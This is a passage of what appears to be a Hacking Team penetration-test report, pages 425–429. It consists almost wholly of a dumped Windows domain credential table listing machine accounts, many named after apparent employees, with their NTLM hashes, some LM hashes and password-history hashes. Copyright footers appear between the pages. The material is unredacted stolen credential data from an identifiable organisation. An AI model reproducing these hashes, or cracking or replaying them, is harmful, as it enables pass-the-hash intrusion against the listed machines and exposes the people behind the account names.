HD-LAPTOP$_history_9:1243:NO PASSWORD*********************:5FDB42081F02108E50407437C8BDECBF:::
HD-LAPTOP$_history_10:1243:NO PASSWORD*********************:58DCF3242682BC6923266C69F3DF7692:::
HMAATUGH2$:1245:NO PASSWORD*********************:1196A5528C5EF7AD9495A99788620F53:::
HMAATUGH2$_history_0:1245:NO PASSWORD*********************:9D309331290EC27A502AD30EAB2B9A95:::
HMAATUGH2$_history_1:1245:NO PASSWORD*********************:7FB826678CA2E6AA75D007562CD1F61D:::
HMAATUGH2$_history_2:1245:NO PASSWORD*********************:E0032E093BD1C6EAE89ACE16C59189BB:::
HMAATUGH2$_history_3:1245:NO PASSWORD*********************:1EB86CE6D187B734124840A728BECA11:::
HMAATUGH2$_history_4:1245:NO PASSWORD*********************:A9F8436C3159A17EAD9DC87835C89EFE:::
HMAATUGH2$_history_5:1245:NO PASSWORD*********************:21CCE1EEABF1A9A27F4A21B021817663:::
HMAATUGH2$_history_6:1245:NO PASSWORD*********************:E679ABF83BEB9C3986D9616294065F4E:::
HMAATUGH2$_history_7:1245:NO PASSWORD*********************:F4D769D1BFFBF4053A3B9E7F9A01D161:::
HMAATUGH2$_history_8:1245:NO PASSWORD*********************:87C106CC4198FA8EC0E1B5E6BCE2739B:::
HMAATUGH2$_history_9:1245:NO PASSWORD*********************:37856DE41E65CAA08E8D1B99206C6CB1:::
HMAATUGH2$_history_10:1245:NO PASSWORD*********************:597D1EED23F1595FBFAFD6A283D36D06:::
MVILLA_LAPTOP$:1255:NO PASSWORD*********************:44587DD71DAA595D940D550010C0B91C:::
MVILLA_LAPTOP$_history_0:1255:NO PASSWORD*********************:34651CD440285FD297CBB5A07E931FFF:::
MVILLA_LAPTOP$_history_1:1255:NO PASSWORD*********************:12ACB22BA30B9DB4DC80A89DE3E8F8F6:::
MVILLA_LAPTOP$_history_2:1255:NO PASSWORD*********************:08BECD5F52B2582CCF03A3859D9178F5:::
MVILLA_LAPTOP$_history_3:1255:NO PASSWORD*********************:9923263708BFB8B5A985B68A475ADDC6:::
MVILLA_LAPTOP$_history_4:1255:NO PASSWORD*********************:9A16F889B508A391D714ADE02D1F6C2D:::
MVILLA_LAPTOP$_history_5:1255:NO PASSWORD*********************:37BFA3FB25CCDE6EFF3ECE8685087240:::
MVILLA_LAPTOP$_history_6:1255:NO PASSWORD*********************:9C71483C59F82273037B1D661615250A:::
MVILLA_LAPTOP$_history_7:1255:NO PASSWORD*********************:3A4C16DF4ABDDBEE35A7C54AC5BF5FA0:::
MVILLA_LAPTOP$_history_8:1255:NO PASSWORD*********************:86D73B6BF26395724B3785EEC0664C61:::
FTORRELLI$:1259:NO PASSWORD*********************:F1285FCA1407D78FBCAE137AAD61EE0F:::
FTORRELLI$_history_0:1259:NO PASSWORD*********************:7B37EEFFB3C7EC6423C0E31F78264ECC:::
FTORRELLI$_history_1:1259:NO PASSWORD*********************:F2EED8DDDF125DB872F6B4D576882188:::
FTORRELLI$_history_2:1259:NO PASSWORD*********************:51C4931967102653D9E24CC3213D0B34:::
FTORRELLI$_history_3:1259:NO PASSWORD*********************:02E899E9330436E84487B33F292FA37D:::
FTORRELLI$_history_4:1259:NO PASSWORD*********************:B26F060404639E7DCCD85656AEBD5D30:::
zcworkstation$:1270:9111CF64DDC6AFF2F91067BB38C36571:483A21694DC2DD05E182A5B296007DAF:::
zcworkstation$_history_0:1270:BEF9FB8F42C8491485A2831CBC8DFB69:6E1D9E9647D4614960EE2F6DEB23C9B1:::
zcworkstation$_history_1:1270:8FB754836309990C5ECCA1929A6520AE:99BE3B3A26A9A06B7239DB13860B288E:::
zcworkstation$_history_2:1270:B983705C8623925A0705FFB1D5ADB827:1521A30984505E64C0F006D2C5505D27:::
zcworkstation$_history_3:1270:9F8715129255EC54BB1C4B742FF744D3:4D910B4B2CBB0902240E2943A70B494B:::
zcworkstation$_history_4:1270:50C5635FC37DD82A82C671B80312251D:73E84DECCAB4F913380089B8124B7F36:::
zcworkstation$_history_5:1270:86DDEC40DC837396FFF0C0CA238671A7:B7D49FA57B2B4A39B62397BF38CABB36:::
LONWINCL1N1$:1271:NO PASSWORD*********************:940F29B6D7584EF7509CC4080310169F:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 425 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
LONWINCL1N1$_history_0:1271:NO PASSWORD*********************:B067B7AE948D135F20F3235B17E52012:::
LONWINCL1N1$_history_1:1271:NO PASSWORD*********************:5391A9B5EDD897214CD864209A74EA15:::
LONWINCL1N1$_history_2:1271:NO PASSWORD*********************:EE1021520FBFC06225317E25E1B3701E:::
LONWINCL1N1$_history_3:1271:NO PASSWORD*********************:A04C1CCBBC53FFF92FCFBF66494B53B3:::
LONWINCL1N1$_history_4:1271:NO PASSWORD*********************:0C6CC139EF191AD87338B44666CCB461:::
LONWINCL1N1$_history_5:1271:NO PASSWORD*********************:9996E708A37163D5ACE76EC4D32DEBA5:::
LONWINCL1N1$_history_6:1271:NO PASSWORD*********************:D44FE52EC3F3C88B8BDA43DE0674EC9E:::
LONWINCL1N1$_history_7:1271:NO PASSWORD*********************:C9BFAC6F9C864D93E709B9F09AF9E155:::
LONWINCL1N1$_history_8:1271:NO PASSWORD*********************:C2F1E1E633DBB81EE706FA3C092D2971:::
LONWINCL1N1$_history_9:1271:NO PASSWORD*********************:2E27F40840DAD182F5D5A960BDA0C06B:::
LONWINCL1N1$_history_10:1271:NO PASSWORD*********************:DB55ECBEE8315F417450BEFC85889DFD:::
BVTESTPC$:1274:NO PASSWORD*********************:96DDC90E91B99A093EA78A16BBEA8937:::
BVTESTPC$_history_0:1274:NO PASSWORD*********************:F39AABFE208179CC5B01CED2E2C807DB:::
BVTESTPC$_history_1:1274:NO PASSWORD*********************:C2CE5EA1A7B4814DC254254A513C681E:::
BVTESTPC$_history_2:1274:NO PASSWORD*********************:9612B28AE1B3DF125DE9FA8D53602EA6:::
BVTESTPC$_history_3:1274:NO PASSWORD*********************:7362C4A59A7E573B2A0A0D8BD997E746:::
BVTESTPC$_history_4:1274:NO PASSWORD*********************:59E3361D42F2ABC659CCB355835C19B0:::
BVTESTPC$_history_5:1274:NO PASSWORD*********************:C9D63C2AAC6344D81EE6FCB487FD7AE2:::
BVTESTPC$_history_6:1274:NO PASSWORD*********************:BBEB1215EC2414AFEAECEA0D212E9E1A:::
BVTESTPC$_history_7:1274:NO PASSWORD*********************:D948AC16C20A343636A147EAA379FD49:::
BVTESTPC$_history_8:1274:NO PASSWORD*********************:8A4224EA4DC7513EA12A5592976D7C85:::
BVTESTPC$_history_9:1274:NO PASSWORD*********************:80BC9701E4059741105B617F50EA5F9F:::
BVTESTPC$_history_10:1274:NO PASSWORD*********************:27F4E0E2B183C91E235C77854B2D2470:::
WEBDIST$:1276:NO PASSWORD*********************:D879770D3BCB440684B95136B3C74AA2:::
WEBDIST$_history_0:1276:NO PASSWORD*********************:1B3FB27A6EE39FDDD257FEF222013928:::
WEBDIST$_history_1:1276:NO PASSWORD*********************:6652AA5DFD122937F09F6555A5D4DD9B:::
WEBDIST$_history_2:1276:NO PASSWORD*********************:E7D042EA227CF6F2FA94F723930A7292:::
WEBDIST$_history_3:1276:NO PASSWORD*********************:67552522B8A3329EDD34699C04CBC582:::
WEBDIST$_history_4:1276:NO PASSWORD*********************:8619BF808D90AEBB67FEEED36E1213BF:::
WEBDIST$_history_5:1276:NO PASSWORD*********************:9CB2AFFEE0B828068247F7FE0B93111F:::
WEBDIST$_history_6:1276:NO PASSWORD*********************:9DBD15E1EFC11885FBE485BD7947E6BD:::
WEBDIST$_history_7:1276:NO PASSWORD*********************:0C89C413A0DB30E46D3B8B4F7917BD95:::
WEBDIST$_history_8:1276:NO PASSWORD*********************:3D518C4969DB0E6FE666E2D57064329C:::
WEBDIST$_history_9:1276:NO PASSWORD*********************:5F34BCE23735BEA11DCCD4AAF4A3CDFD:::
WEBDIST$_history_10:1276:NO PASSWORD*********************:3B53397ACE9A149A35F714514AE65F0B:::
VAIOR600-IT$:1279:NO PASSWORD*********************:BF3DE131E7C185F536263A4345BA5112:::
VAIOR600-IT$_history_0:1279:NO PASSWORD*********************:4A63CAB5B0DF2D15C1BB114C3ABC80B0:::
VAIOR600-IT$_history_1:1279:NO PASSWORD*********************:56D466AEF0979F7CE939A01E951FD3B6:::
VAIOR600-IT$_history_2:1279:NO PASSWORD*********************:CA5F3E8E9ACD05FC334DE598FBA2FF7E:::
VAIOR600-IT$_history_3:1279:NO PASSWORD*********************:DD2C4E380CCDF738D0103DD4FC4099B5:::
VAIOR600-IT$_history_4:1279:NO PASSWORD*********************:52E8A19B1BDC073FC9038828987781A0:::
VAIOR600-IT$_history_5:1279:NO PASSWORD*********************:2ACB0115C3184FF93D3BE6ECBD035086:::
VAIOR600-IT$_history_6:1279:NO PASSWORD*********************:21ABD2CE58A1C0734AA95EFDA0AE488C:::
VAIOR600-IT$_history_7:1279:NO PASSWORD*********************:AB89397DC898442F2A7134040C474BBF:::
VAIOR600-IT$_history_8:1279:NO PASSWORD*********************:5A7EB87AF16D82569C518FB176626CA3:::
ANEAGU$:1286:NO PASSWORD*********************:947A5D28A1A589A14F3C24B44689EFB2:::
ANEAGU$_history_0:1286:NO PASSWORD*********************:3AA513AADBEE56678079007F73A55AC7:::
ANEAGU$_history_1:1286:NO PASSWORD*********************:921993567A2D52BFE7D4E1F3E7E66E1D:::
ANEAGU$_history_2:1286:NO PASSWORD*********************:D8A71556BB830DF0712B643A7BD2E98A:::
ANEAGU$_history_3:1286:NO PASSWORD*********************:298BE3453D9B7E00407BAE4999FB441B:::
ANEAGU$_history_4:1286:NO PASSWORD*********************:910D26EECCC9E462A01A2F93C12A5B40:::
ANEAGU$_history_5:1286:NO PASSWORD*********************:F6B64797A8E7C6BFCBA02C45BF71B70B:::
ANEAGU$_history_6:1286:NO PASSWORD*********************:E4644BAE0C3D2F991FC5F0DD667CA3AD:::
ANEAGU$_history_7:1286:NO PASSWORD*********************:F4ACE5262357BCE0A336B07C9AE96F91:::
ANEAGU$_history_8:1286:NO PASSWORD*********************:55EF7A5E0DBB424C7FCAFCAB7129F160:::
ANEAGU$_history_9:1286:NO PASSWORD*********************:00F690D11EBBFC3589B09344D0040704:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 426 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
ANEAGU$_history_10:1286:NO PASSWORD*********************:837D2C889F2DE2D1D3B6E238F6D81E16:::
MILSIAWS02$:1287:NO PASSWORD*********************:8C72061DB3EAB57A17823522642B5749:::
MILSIAWS02$_history_0:1287:NO PASSWORD*********************:A37377BF0E7D866F5EB198F4F57FFBC4:::
MILSIAWS02$_history_1:1287:NO PASSWORD*********************:C4ABEF3214A2A929970C6290AAF534D5:::
MILSIAWS02$_history_2:1287:NO PASSWORD*********************:2DF61FDAB270F25846FEAA6B38235A41:::
MILSIAWS02$_history_3:1287:NO PASSWORD*********************:7844CE8EEFECBDA8388C033D1D69CCF3:::
MILSIAWS02$_history_4:1287:NO PASSWORD*********************:5C89F4B4B293D54049C4E47CEDE9DFED:::
MILSIAWS02$_history_5:1287:NO PASSWORD*********************:9AC3BE24F57F35BDC72BDE979E5338A4:::
MILSIAWS02$_history_6:1287:NO PASSWORD*********************:DE95CDEB9DF50DB29734D3FE858549E8:::
MILSIAWS02$_history_7:1287:NO PASSWORD*********************:147FF95DFBEDD39048B68DAE06EEDEB7:::
MILSIAWS02$_history_8:1287:NO PASSWORD*********************:9316F9EF2FEBE04436AC6E679E42587C:::
MILSIAWS02$_history_9:1287:NO PASSWORD*********************:108F4949218BF3ED7D761B3FD5CE15FD:::
MILSIAWS02$_history_10:1287:NO PASSWORD*********************:56E40E2DAB12181DAFF68E6CB169528A:::
MILSIAWS01$:1288:NO PASSWORD*********************:075A326F2A872F6FD51B887D1468568C:::
MILSIAWS01$_history_0:1288:NO PASSWORD*********************:28B66EF8C023704D8E1C173E61665FBA:::
MILSIAWS01$_history_1:1288:NO PASSWORD*********************:E5B07A8B1A376DC5CD65CBE062B4EAD1:::
MILSIAWS01$_history_2:1288:NO PASSWORD*********************:427F7679A68CDD06C0C4CB61F17BD6C7:::
MILSIAWS01$_history_3:1288:NO PASSWORD*********************:DCA59132734F4FAE3A7255C4016F67BA:::
MILSIAWS01$_history_4:1288:NO PASSWORD*********************:258C7D2D0A358B146AE2A00C3C36B0BD:::
MILSIAWS01$_history_5:1288:NO PASSWORD*********************:02D3447778361FA527CB60E15711407C:::
MILSIAWS01$_history_6:1288:NO PASSWORD*********************:783490D54F05EAF274CDDA3784E9B07B:::
MILSIAWS01$_history_7:1288:NO PASSWORD*********************:944D384AE3160B5372D0A1BE25498D1E:::
MILSIAWS01$_history_8:1288:NO PASSWORD*********************:965AE15A8F0B32E996D2FCB240AA855F:::
MILSIAWS01$_history_9:1288:NO PASSWORD*********************:A8C3938600848B83EDFDB67AA0E9BB05:::
MILSIAWS04$:1290:NO PASSWORD*********************:4D4608EAB22D6DD2C5A39FAB380CA0FA:::
MILSIAWS04$_history_0:1290:NO PASSWORD*********************:4E854A2ADF1C207DEF2A2F6BDA739CC9:::
MILSIAWS04$_history_1:1290:NO PASSWORD*********************:204943F834A767DECBF57A663EA6E7C2:::
MILSIAWS04$_history_2:1290:NO PASSWORD*********************:03EBCFE00BBB0E52C53196AF8267835C:::
MILSIAWS04$_history_3:1290:NO PASSWORD*********************:46F8EA5D69C6A1F330E054B087AE3213:::
MILSIAWS04$_history_4:1290:NO PASSWORD*********************:30B0BC03C47656227F9A4003ACB1D0D6:::
MILSIAWS04$_history_5:1290:NO PASSWORD*********************:4B42740954E0DEE888C87F2CCDA4F51C:::
MILSIAWS04$_history_6:1290:NO PASSWORD*********************:65444EEB26D97E70B3EAC9E5B5EC0EE7:::
MILSIAWS04$_history_7:1290:NO PASSWORD*********************:E5CBC161E14341C0C7089E45C64A6ADB:::
MILSIAWS04$_history_8:1290:NO PASSWORD*********************:E5C9F868D68795DFED1F59944FB2E14B:::
MILSIAWS04$_history_9:1290:NO PASSWORD*********************:50FB525B4712B3758C1284C8C4C5AC47:::
MILSIAWS04$_history_10:1290:NO PASSWORD*********************:1EAD6B421078CAAFA401ACF5D98C062B:::
A-8AH3CJKP6WOET$:1291:NO PASSWORD*********************:C644BAF63BD7D5533CC291D385B7F707:::
A-8AH3CJKP6WOET$_history_0:1291:NO PASSWORD*********************:CB70949B523DCC167119775E38B2A285:::
MIL-BADGE$:1292:NO PASSWORD*********************:49B4A571F43502F2B5C6D392C7109CF2:::
MIL-BADGE$_history_0:1292:NO PASSWORD*********************:6351FAC8311D3A635311C3ACF7313C79:::
MIL-BADGE$_history_1:1292:NO PASSWORD*********************:264969C7F43FF061F81F450CB747FDC1:::
MIL-BADGE$_history_2:1292:NO PASSWORD*********************:A22122E5B3504C1C6CBE911C53D452A6:::
MIL-BADGE$_history_3:1292:NO PASSWORD*********************:49A78350246E0C24D8BD7A03212AF627:::
MIL-BADGE$_history_4:1292:NO PASSWORD*********************:213E0EA6F78BB0E5DF84F3EA37691011:::
MIL-BADGE$_history_5:1292:NO PASSWORD*********************:A58FB0894660BC9FE7E8D4917AB4FF7A:::
MIL-BADGE$_history_6:1292:NO PASSWORD*********************:34DDA803A7E47C54F86C140ADE79917B:::
MIL-BADGE$_history_7:1292:NO PASSWORD*********************:C8B306C8797CF932AD5ADB03AC39E3F1:::
MIL-BADGE$_history_8:1292:NO PASSWORD*********************:DE981D7BC27A20C36B7AFBA561A4191A:::
MIL-BADGE$_history_9:1292:NO PASSWORD*********************:C584174722C795197D266830398A96A6:::
MIL-BADGE$_history_10:1292:NO PASSWORD*********************:F03DB6E18B2FC68A9EEE5F6E629A3C3A:::
MMAPELLI$:1321:NO PASSWORD*********************:3A73DC9FC8DB91D546BB1107861E49CA:::
MMAPELLI$_history_0:1321:NO PASSWORD*********************:B5ADB0CA44FA136918A8CE05B332073C:::
MMAPELLI$_history_1:1321:NO PASSWORD*********************:EC7A73D5E052622EA573B1522F9F29F8:::
MMAPELLI$_history_2:1321:NO PASSWORD*********************:6D4CFC7948A0EA433F2D7761D5559533:::
MMAPELLI$_history_3:1321:NO PASSWORD*********************:9593B9AE5A2215C75AE2DBFF264719BC:::
MMAPELLI$_history_4:1321:NO PASSWORD*********************:217C112D25F62D5E4B72831AA0E45E31:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 427 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
MMAPELLI$_history_5:1321:NO PASSWORD*********************:B7377F667F9C6E1B157E8A5C86FC2C0B:::
MMAPELLI$_history_6:1321:NO PASSWORD*********************:34F403AA6C7D22C30749176FF6CD20E8:::
MMAPELLI$_history_7:1321:NO PASSWORD*********************:B0534EE87F6E1328DB7CF8A984DF80BE:::
MMAPELLI$_history_8:1321:NO PASSWORD*********************:9AF1E853B9941B7A0EFC697D835A9393:::
MMAPELLI$_history_9:1321:NO PASSWORD*********************:94DFBA8F4425BE5EADF9E71636173591:::
MMAPELLI$_history_10:1321:NO PASSWORD*********************:9287A33E9FC25016FB0B57F865A1D198:::
FCAZZULINI$:1323:NO PASSWORD*********************:16EFAECE7B827A576E2464DE63934102:::
FCAZZULINI$_history_0:1323:NO PASSWORD*********************:FA19BDD79F8BACC3E5543186D2C0C17E:::
FCAZZULINI$_history_1:1323:NO PASSWORD*********************:0DF856DE119060F006E76E8B9E68B670:::
FCAZZULINI$_history_2:1323:NO PASSWORD*********************:98C456CF8E1C08E78092E741DCD21AD4:::
FCAZZULINI$_history_3:1323:NO PASSWORD*********************:68CEFCD500DD8ACDA2895EAE415F0281:::
FCAZZULINI$_history_4:1323:NO PASSWORD*********************:882D7A3E743A6E31969BC53462E0BAC9:::
FCAZZULINI$_history_5:1323:NO PASSWORD*********************:A889EBC30FD005183336BC54C3A10797:::
FCAZZULINI$_history_6:1323:NO PASSWORD*********************:CF2BEE2D03E197EE5F16B407FB75E5B2:::
FCAZZULINI$_history_7:1323:NO PASSWORD*********************:55E020501BE30331639C19D0E831E3FE:::
FCAZZULINI$_history_8:1323:NO PASSWORD*********************:316EF6E161A41CFA18CF6B8CC9947CB5:::
FCAZZULINI$_history_9:1323:NO PASSWORD*********************:5D864738963B0994ACFB66FC3B77E1B0:::
FCAZZULINI$_history_10:1323:NO PASSWORD*********************:8C7F8A063C864232AB9D4F4B502B3D3E:::
PCTEST1$:1324:NO PASSWORD*********************:792F9A282ECCBDCBDEE2713B92EB9B50:::
PCTEST1$_history_0:1324:NO PASSWORD*********************:68361A119E10E9F3184565C6F99AF6E1:::
PCTEST1$_history_1:1324:NO PASSWORD*********************:9F345A7A8EC4D3E1C340F80A226CA411:::
PCTEST1$_history_2:1324:NO PASSWORD*********************:015F5112869AC6AA101B26C02399BDBE:::
PCTEST1$_history_3:1324:NO PASSWORD*********************:8E0920BDDDC9083B7BE4ED822EA41EB2:::
SPARE01$:1330:NO PASSWORD*********************:9969654E5FF7442CFC290D09627D11B8:::
SPARE01$_history_0:1330:NO PASSWORD*********************:96B348F4CDB6C2778BC3DBB757288440:::
SPARE01$_history_1:1330:NO PASSWORD*********************:3FDF082E9F2B3AEDA90B8CC32AE197B3:::
SPARE01$_history_2:1330:NO PASSWORD*********************:2EE18F9DE0B0F1FA7534D24614EADE63:::
SPARE01$_history_3:1330:NO PASSWORD*********************:6003F4FE7D06E2CB4CB1E13BCA11BD1B:::
SPARE02$:1342:NO PASSWORD*********************:E6FA046ABCE9D377673B3FBEC1126BE2:::
SPARE02$_history_0:1342:NO PASSWORD*********************:ABD8821543A065D86F58E500DC321B08:::
SPARE02$_history_1:1342:NO PASSWORD*********************:632EF364A2A17C77C9A6E225CF67F61B:::
SPARE02$_history_2:1342:NO PASSWORD*********************:7D32C97B2CCF374D5365066EAA2B4533:::
SPARE02$_history_3:1342:NO PASSWORD*********************:9F5A66F384FAD70CC67B6A16CCF1FC20:::
SPARE02$_history_4:1342:NO PASSWORD*********************:B1E8EDD789F5DD83C4C569108A1B32B0:::
PSANTA-LAPTOP$:1343:NO PASSWORD*********************:9E26D6360E31B4CCE8DE829133B461FF:::
PSANTA-LAPTOP$_history_0:1343:NO PASSWORD*********************:8535A3E2A5A42545A2F99955E11E2826:::
PSANTA-LAPTOP$_history_1:1343:NO PASSWORD*********************:11CD8AD4D6760DA9D50B77A1A1F9121C:::
PSANTA-LAPTOP$_history_2:1343:NO PASSWORD*********************:A04BF0E520C010A9DDCF351C48D2F014:::
PSANTA-LAPTOP$_history_3:1343:NO PASSWORD*********************:C5F214CD968F237D080038432729BA82:::
PSANTA-LAPTOP$_history_4:1343:NO PASSWORD*********************:997D8F29422D73EC28C34792909D860F:::
PSANTA-LAPTOP$_history_5:1343:NO PASSWORD*********************:242A9EE5812B4B34FB5582CF7197CCCA:::
PSANTA-LAPTOP$_history_6:1343:NO PASSWORD*********************:A57568B18BE77B37070377138B52E448:::
PSANTA-LAPTOP$_history_7:1343:NO PASSWORD*********************:EE3B094577530FCAEF6D98617AFDDE28:::
PSANTA-LAPTOP$_history_8:1343:NO PASSWORD*********************:98F1C35FB91D54B4958180224D03A5F0:::
PSANTA-LAPTOP$_history_9:1343:NO PASSWORD*********************:3C35E87599C52A8172677D76890575E3:::
PSANTA-LAPTOP$_history_10:1343:NO PASSWORD*********************:1F3CC80715D6CC3D094657D78DE1EA04:::
FPOZZI-LAP$:1344:NO PASSWORD*********************:32E59FBF4C17D7243170146AB4C9D9E4:::
FPOZZI-LAP$_history_0:1344:NO PASSWORD*********************:A70EEA34DE40BCD3141AE30B811E76A6:::
FPOZZI-LAP$_history_1:1344:NO PASSWORD*********************:2F342DFFE95EF01B72373588E1034E5B:::
FPOZZI-LAP$_history_2:1344:NO PASSWORD*********************:8E3431FD8DA3F5128A3A45BA747C5F25:::
FPOZZI-LAP$_history_3:1344:NO PASSWORD*********************:CE421FEC5FEF846474CD997B47EDDBA2:::
FPOZZI-LAP$_history_4:1344:NO PASSWORD*********************:997A9E8E4B5BD511F456F27503531654:::
FPOZZI-LAP$_history_5:1344:NO PASSWORD*********************:1BC7A37289E312736E0B8F4BE8E902F2:::
FPOZZI-LAP$_history_6:1344:NO PASSWORD*********************:25C9C4A3DA7BF2AEC168176ECADEFBD4:::
FPOZZI-LAP$_history_7:1344:NO PASSWORD*********************:572085E56E0DC81E6FCAA608192D07CF:::
FPOZZI-LAP$_history_8:1344:NO PASSWORD*********************:5A7DF058182C41DAC148A03CC13C2E0D:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 428 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
FPOZZI-LAP$_history_9:1344:NO PASSWORD*********************:BD5A6F308A329DD53AF51BF5C2D893B5:::
FPOZZI-LAP$_history_10:1344:NO PASSWORD*********************:90BD1A8735492D46F120FAB8E6B226D1:::
CMASTROTA-LAP$:1345:NO PASSWORD*********************:70062D8F6B92D843319B432C398A15CA:::
CMASTROTA-LAP$_history_0:1345:NO PASSWORD*********************:EBF139EB12C12FA92FD4B1586579CE2A:::
CMASTROTA-LAP$_history_1:1345:NO PASSWORD*********************:CE5C16C15D6F856B4782844EE356E9FA:::
CMASTROTA-LAP$_history_2:1345:NO PASSWORD*********************:E203B632DB78590CBB9EDB35C79C15E0:::
CMASTROTA-LAP$_history_3:1345:NO PASSWORD*********************:328391E09DF92B25ACE5136534615DB1:::
CMASTROTA-LAP$_history_4:1345:NO PASSWORD*********************:C1D41BC0A6C2618752E08D37131E33D4:::
CMASTROTA-LAP$_history_5:1345:NO PASSWORD*********************:F1A9740161967C21546DA97E0161E5D6:::
CMASTROTA-LAP$_history_6:1345:NO PASSWORD*********************:5A4DADDF4DCCCFCC44302CE1504D3357:::
CMASTROTA-LAP$_history_7:1345:NO PASSWORD*********************:67C4214D51CD34620098BB6BAF65C8BA:::
CMASTROTA-LAP$_history_8:1345:NO PASSWORD*********************:38DDC6F1D95229691153C0BD9E95987B:::
CMASTROTA-LAP$_history_9:1345:NO PASSWORD*********************:958EBF5B3269DEFAA143D5DE8E4C8D2A:::
CMASTROTA-LAP$_history_10:1345:NO PASSWORD*********************:CFDDBF7A2BA11CA0E583FC83527AC918:::
PC-DEMO$:1347:NO PASSWORD*********************:C9846F696B29EDA2932A173362C97E03:::
PC-DEMO$_history_0:1347:NO PASSWORD*********************:F53024B975FF4950356406F783EFD1C1:::
PC-DEMO$_history_1:1347:NO PASSWORD*********************:889BCA119509E9CBC4B9704C4CD4C7D6:::
PC-DEMO$_history_2:1347:NO PASSWORD*********************:F32F68E502F5622582DA420553916949:::
PC-DEMO$_history_3:1347:NO PASSWORD*********************:9F5526AD193C15B824B8EC148358A5CB:::
PC-DEMO$_history_4:1347:NO PASSWORD*********************:6C5F36034E9D13601A530AE719C3705D:::
PC-DEMO$_history_5:1347:NO PASSWORD*********************:26F19709BFC734C3570CF136AEA58512:::
PC-DEMO$_history_6:1347:NO PASSWORD*********************:0A4E028A0AB42B7ECD2A849F3C28B743:::
PC-DEMO$_history_7:1347:NO PASSWORD*********************:B64581C25A0767A8B624DBE6DBC3757C:::
PC-DEMO$_history_8:1347:NO PASSWORD*********************:BA12266A0D2C20F4E359983FA2672FF3:::
PC-DEMO$_history_9:1347:NO PASSWORD*********************:B02A9472FAEC51976B4218DF96E3E4D8:::
PC-DEMO$_history_10:1347:NO PASSWORD*********************:ED1040D41A2AC7F7EEAAF1E3253BE318:::
ABARRERA-LAP$:1354:NO PASSWORD*********************:D2CBEB3D1C8CBD5162D3165C8060043C:::
ABARRERA-LAP$_history_0:1354:NO PASSWORD*********************:7AFB17991134BA15B7D4F2A2A201CC67:::
ABARRERA-LAP$_history_1:1354:NO PASSWORD*********************:2C4D1E8A9BC4AD7884B4CDC312D864CD:::
ABARRERA-LAP$_history_2:1354:NO PASSWORD*********************:060F479CFA8E4E2510DED3164AECD8C6:::
ABARRERA-LAP$_history_3:1354:NO PASSWORD*********************:1816956D1E091F6798614556D1CF52AC:::
ABARRERA-LAP$_history_4:1354:NO PASSWORD*********************:228F078269BE496B6993CBACA1BD0322:::
ABARRERA-LAP$_history_5:1354:NO PASSWORD*********************:B25668ADC2B9181845C3515D7B0FE82A:::
ABARRERA-LAP$_history_6:1354:NO PASSWORD*********************:09A532001C25F012CBEBAC027DCD40BA:::
ABARRERA-LAP$_history_7:1354:NO PASSWORD*********************:10DBBCDE235ABF06455F821CAF814187:::
ABARRERA-LAP$_history_8:1354:NO PASSWORD*********************:BCB886E3D4A83AD39EE3F6B32C1B913F:::
ABARRERA-LAP$_history_9:1354:NO PASSWORD*********************:0ADF473992F9986E058F7CBDBA736E3D:::
ABARRERA-LAP$_history_10:1354:NO PASSWORD*********************:2EE5C86707F62CBA4C1DA2D1AA42B6AE:::
ABERNAZZOLI-LAP$:1356:NO PASSWORD*********************:C82C202BE54E366AD91C9F9A11216407:::
ABERNAZZOLI-LAP$_history_0:1356:NO PASSWORD*********************:C4C4304C974DBB005030383A44E3B58D:::
ABERNAZZOLI-LAP$_history_1:1356:NO PASSWORD*********************:9F9610C8BF41E14DA24BA0F1866FA99D:::
ABERNAZZOLI-LAP$_history_2:1356:NO PASSWORD*********************:0245EF17777A45F46EDCFB6753E87E26:::
ABERNAZZOLI-LAP$_history_3:1356:NO PASSWORD*********************:23167E776DFE880997F078EA62A47C3F:::
ABERNAZZOLI-LAP$_history_4:1356:NO PASSWORD*********************:46A16B03354BDE32D36DADCFFDF0664B:::
ABERNAZZOLI-LAP$_history_5:1356:NO PASSWORD*********************:6E284EA35A19B8BB8E96AD5422C89F38:::
ABERNAZZOLI-LAP$_history_6:1356:NO PASSWORD*********************:4EDA960DC4E4B14394DD36337270CC70:::
ABERNAZZOLI-LAP$_history_7:1356:NO PASSWORD*********************:590477036E9393970F2B0273AA56836C:::
ABERNAZZOLI-LAP$_history_8:1356:NO PASSWORD*********************:052FC82D2C10EA1AC2211EB5ED6F362A:::
ABERNAZZOLI-LAP$_history_9:1356:NO PASSWORD*********************:2AA9CE19D6EF5CA840E60D46764F575D:::
ABERNAZZOLI-LAP$_history_10:1356:NO PASSWORD*********************:A192A0E5B22A889E1D5D874A46815B28:::
MBIAZZO$:1358:NO PASSWORD*********************:F6464710B2368C6596C33D61434B8C2B:::
MBIAZZO$_history_0:1358:NO PASSWORD*********************:FE50484E95D3A98C56D6073A4E9274D1:::
MBIAZZO$_history_1:1358:NO PASSWORD*********************:D7512603C8EF1A87F7F617E2EBE5E6A6:::
MBIAZZO$_history_2:1358:NO PASSWORD*********************:C76638A8499E2878BA38843481035511:::
MBIAZZO$_history_3:1358:NO PASSWORD*********************:2522A495DFB182AF6B49AA3F6796FFA0:::
MBIAZZO$_history_4:1358:NO PASSWORD*********************:959B3542123A81B590517B8BCA516900:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 429 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
